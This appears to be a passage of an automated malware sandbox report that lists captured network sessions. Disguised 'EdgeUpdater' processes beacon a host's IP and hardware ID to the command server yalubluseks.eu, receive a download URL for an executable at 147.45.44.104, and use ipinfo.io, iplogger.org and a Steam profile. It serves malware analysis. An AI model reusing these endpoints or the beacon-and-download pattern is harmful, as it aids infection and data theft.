                                                                                                                                                                                                                                          68192.168.2.658749104.26.13.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:36.977307081 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:37.440551996 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:37 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cbdbad3c8c1b-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          69192.168.2.658751104.26.13.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:37.906897068 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:38.381953955 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:38 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cbe18ddb0f81-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          70192.168.2.658753104.26.13.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:38.441410065 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:38.894587994 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:38 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cbe4b94fde9b-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          71192.168.2.658757104.26.13.20580
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:42.553484917 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:43.016825914 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:42 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cbfe7974437e-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          72192.168.2.658759104.26.13.20580
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:44.196461916 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:44.679622889 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:44 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cc08d9620f99-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          73192.168.2.658761104.26.13.20580
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:46.212874889 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:46.709153891 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:46 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cc158e78438e-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          74192.168.2.658765104.26.13.20580
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:58.619026899 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:46:59.077639103 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:59 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cc62de4d4201-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33
                                                                                                                                                                                                                                          Oct 2, 2024 14:47:00.083240032 CEST39OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Oct 2, 2024 14:47:00.193064928 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:47:00 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cc69df634201-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          75192.168.2.658767104.26.13.20580
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:47:00.141880989 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:47:00.600455999 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:47:00 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cc6c6affc340-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33
                                                                                                                                                                                                                                          Oct 2, 2024 14:47:01.468693018 CEST39OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Oct 2, 2024 14:47:01.578639984 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:47:01 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cc7279c3c340-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          76192.168.2.658769104.26.13.20580
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:47:00.564703941 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:47:01.039345026 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:47:00 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cc6f192517b1-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33
                                                                                                                                                                                                                                          Oct 2, 2024 14:47:01.994676113 CEST39OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Oct 2, 2024 14:47:02.101810932 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:47:02 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cc75ce7c17b1-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          0192.168.2.649709172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:42:46 UTC167OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          2024-10-02 12:42:46 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:42:46 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc
                                                                                                                                                                                                                                          2024-10-02 12:42:47 UTC605INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:42:47 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u6pkh6H7dUN3VFzeVh9eZcbtqq8FpumTDJ0PMCkyv1IHcOgyzup1gnFqazVNhP8mwuh22mZ%2B6of%2FmXzcLZezPSO09sgJvpF3JQpkWGvV69W2AhhM0qmbeEY15Z9K4s5wgg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c6392b79c34f-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          1192.168.2.649710172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:42:47 UTC144OUTPOST /get_file.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:42:47 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:42:47 UTC84OUTData Raw: 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc&ip=8.46.123.33
                                                                                                                                                                                                                                          2024-10-02 12:42:48 UTC660INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:42:48 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MYPIkjkC3AgnO8BMlQkTVkdKQs6Kk8hX4U9RgaUdTO57ok%2BKFHzmuSH3AiOA%2BuS9JXIEjzNZI6%2FX3TzVivCJxsbBQR9RrAdQ%2BlZZFjzKUvishBKVg40g7K9rNEXnhSDLzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c6409a424257-EWR
                                                                                                                                                                                                                                          32
                                                                                                                                                                                                                                          http://147.45.44.104/ldms/66fb252fe232b_Patksl.exe
                                                                                                                                                                                                                                          2024-10-02 12:42:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          2192.168.2.649713172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:42:51 UTC146OUTPOST /get_update.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:42:51 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:42:51 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                                                                                                                                                                                                                                          Data Ascii: current_version=0.3
                                                                                                                                                                                                                                          2024-10-02 12:42:51 UTC609INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:42:51 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kuj97YZMDT%2FXxCLQMoCDDWN6P3V394R7hXAk%2FhRxUhEqNgjk1W9uLwn6vkKey%2BoSrmrS8wasC7rN6KDxmYGtORDTjK2ZAlx8K9blhXD%2BR0XtYZQKCKKic0xbdy8XSe8tlA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c6582fac437b-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          3192.168.2.649715173.231.16.77443364C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:42:54 UTC202OUTGET /?format=json HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Host: api64.ipify.org
                                                                                                                                                                                                                                          2024-10-02 12:42:54 UTC156INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:42:54 GMT
                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                          Content-Length: 20
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          2024-10-02 12:42:54 UTC20INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                                                                                                                                                                                                                          Data Ascii: {"ip":"8.46.123.33"}


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          4192.168.2.64971634.117.59.81443364C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:42:55 UTC236OUTGET /widget/demo/8.46.123.33 HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Referer: https://ipinfo.io/
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Host: ipinfo.io
                                                                                                                                                                                                                                          2024-10-02 12:42:55 UTC458INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                                                                          Content-Length: 1025
                                                                                                                                                                                                                                          content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                          date: Wed, 02 Oct 2024 12:42:55 GMT
                                                                                                                                                                                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                                                                                                                          x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                          x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                          via: 1.1 google
                                                                                                                                                                                                                                          strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:42:55 UTC932INData Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20
                                                                                                                                                                                                                                          Data Ascii: { "input": "8.46.123.33", "data": { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level
                                                                                                                                                                                                                                          2024-10-02 12:42:55 UTC93INData Raw: 6b 20 41 62 75 73 65 20 44 65 73 6b 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 30 2f 32 34 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 31 2d 38 37 37 2d 38 38 36 2d 36 35 31 35 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d
                                                                                                                                                                                                                                          Data Ascii: k Abuse Desk", "network": "8.46.123.0/24", "phone": "+1-877-886-6515" } }}


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          5192.168.2.658514104.26.3.46443364C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:04 UTC196OUTGET /1nhuM4.js HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Host: iplogger.org
                                                                                                                                                                                                                                          2024-10-02 12:43:05 UTC997INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:04 GMT
                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          memory: 0.43090057373046875
                                                                                                                                                                                                                                          expires: Wed, 02 Oct 2024 12:43:04 +0000
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                          x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                          CF-Cache-Status: BYPASS
                                                                                                                                                                                                                                          Set-Cookie: 40589004137263905=2; expires=Thu, 02 Oct 2025 12:43:04 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                                                                                                          Set-Cookie: clhf03028ja=8.46.123.33; expires=Thu, 02 Oct 2025 12:43:04 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=autzedUQkSqjYydAf5hxiUm0p%2FY6%2FvBHy8JEnHw7BGGVoQclQaGgrIH3WyZBZvhf%2B0g7JFP%2F%2Bww2cPNi8IoNJ0BUX6SxgPV1eAusoZV5BpQYW2zf14gfwKht6t00fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c6a9aa5d8c69-EWR
                                                                                                                                                                                                                                          2024-10-02 12:43:05 UTC122INData Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
                                                                                                                                                                                                                                          2024-10-02 12:43:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          6192.168.2.658520104.102.49.2544436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:20 UTC119OUTGET /profiles/76561199780418869 HTTP/1.1
                                                                                                                                                                                                                                          Host: steamcommunity.com
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
